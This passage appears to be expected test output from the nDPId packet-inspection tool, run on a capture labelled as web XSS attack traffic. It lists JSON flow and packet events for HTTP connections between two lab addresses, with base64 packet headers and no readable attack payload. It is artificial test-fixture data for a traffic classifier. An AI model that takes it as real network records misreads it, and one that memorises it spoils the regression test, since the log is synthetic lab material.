port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":292,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347465304,"flow_last_seen":1499347470740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57480,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347466553,"flow_last_seen":1499347471741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347467793,"flow_last_seen":1499347473742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347469060,"flow_last_seen":1499347474742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57522,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347470328,"flow_last_seen":1499347475742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":297,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347471594,"flow_last_seen":1499347476742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5262,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":298,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347474100,"flow_last_seen":1499347479744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347597780,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57576,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347598383,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347598383,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5265,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jLdAAD4GORmsEAABwKgKMuYaAFCJpsNgAAAAAKACchDafwAAAgQFtAQCCAoBO0\/XAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5266,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":2,"flow_last_seen":1499347598383,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347598383,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5hrRW5D8iabDYaAScSBT1AAAAgQFtAQCCAoD5SFNATtP1wEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5268,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":3,"flow_last_seen":1499347598385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347598385,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jLhAAD4GOSCsEAABwKgKMuYaAFCJpsNh0VuQ\/YAQAOXy2gAAAQEICgE7T9gD5SFN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347599663,"flow_last_seen":1499347599663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347599663,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5277,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1499347599663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qjVAAD4GG5usEAABwKgKMuYoAFAgjfstAAAAAKACchAKfQAAAgQFtAQCCAoBO1EYAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5278,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":2,"flow_last_seen":1499347599663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347599663,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5igR\/+x3II37LqAScSDmcgAAAgQFtAQCCAoD5SKNATtRGAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5279,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":3,"flow_last_seen":1499347599664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347599664,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qjZAAD4GG6KsEAABwKgKMuYoAFAgjfsuEf\/seIAQAOWFegAAAQEICgE7URgD5SKN"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347602223,"flow_last_seen":1499347602223,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347602223,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5295,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1499347602223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZzNAAD4GXp2sEAABwKgKMuZCAFA0xTSkAAAAAKACchC6NQAAAgQFtAQCCAoBO1OXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5296,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":2,"flow_last_seen":1499347602223,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347602223,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5kLiWaZmNMU0paAScSAJYgAAAgQFtAQCCAoD5SUNATtTlwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5297,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":3,"flow_last_seen":1499347602224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347602224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZzRAAD4GXqSsEAABwKgKMuZCAFA0xTSl4lmmZ4AQAOWoaAAAAQEICgE7U5gD5SUN"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347603507,"flow_last_seen":1499347603507,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347603507,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5307,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1499347603507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rD1AAD4GGZOsEAABwKgKMuZQAFBpufjkAAAAAKACchC\/sAAAAgQFtAQCCAoBO1TZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5308,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":2,"flow_last_seen":1499347603507,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347603507,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5lDEx3+iabn45aAScSBR8gAAAgQFtAQCCAoD5SZOATtU2QEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5309,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":3,"flow_last_seen":1499347603508,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347603508,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rD5AAD4GGZqsEAABwKgKMuZQAFBpufjlxMd\/o4AQAOXw+QAAAQEICgE7VNkD5SZO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347604752,"flow_last_seen":1499347604752,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347604752,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5319,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1499347604752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ltJAAD4GLv6sEAABwKgKMuZeAFCga8DCAAAAAKACchC\/2wAAAgQFtAQCCAoBO1YQAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":2,"flow_last_seen":1499347604752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347604752,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5l5oMbaJoGvAw6AScSB2lQAAAgQFtAQCCAoD5SeFATtWEAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":3,"flow_last_seen":1499347604753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347604753,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ltNAAD4GLwWsEAABwKgKMuZeAFCga8DDaDG2ioAQAOUVnQAAAQEICgE7VhAD5SeF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347606078,"flow_last_seen":1499347606078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347606078,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5331,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1499347606078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83l9AAD4G53CsEAABwKgKMuZsAFA9+okEAAAAAKACchBYsgAAAgQFtAQCCAoBO1dbAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5332,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":2,"flow_last_seen":1499347606078,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347606078,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5mwyfi78PfqJBaAScSDLYAAAAgQFtAQCCAoD5SjRATtXWwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":3,"flow_last_seen":1499347606080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347606080,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03mBAAD4G53esEAABwKgKMuZsAFA9+okFMn4u\/YAQAOVqZwAAAQEICgE7V1wD5SjR"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347607344,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607344,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59002,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8neJAAD4GJ+6sEAABwKgKMuZ6AFBKtMV6AAAAAKACchAONwAAAgQFtAQCCAoBO1iYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5342,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":2,"flow_last_seen":1499347607344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347607344,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5nrlgxvESrTFe6AScSDf2wAAAgQFtAQCCAoD5SoNATtYmAEDAwc="} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5343,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":3,"flow_last_seen":1499347607345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347607345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0neNAAD4GJ\/WsEAABwKgKMuZ6AFBKtMV75YMbxYAQAOV+4wAAAQEICgE7WJgD5SoN"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347419786,"flow_last_seen":1499347486791,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232681,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":56994,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347475384,"flow_last_seen":1499347480745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5350,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347476667,"flow_last_seen":1499347481745,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347607783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
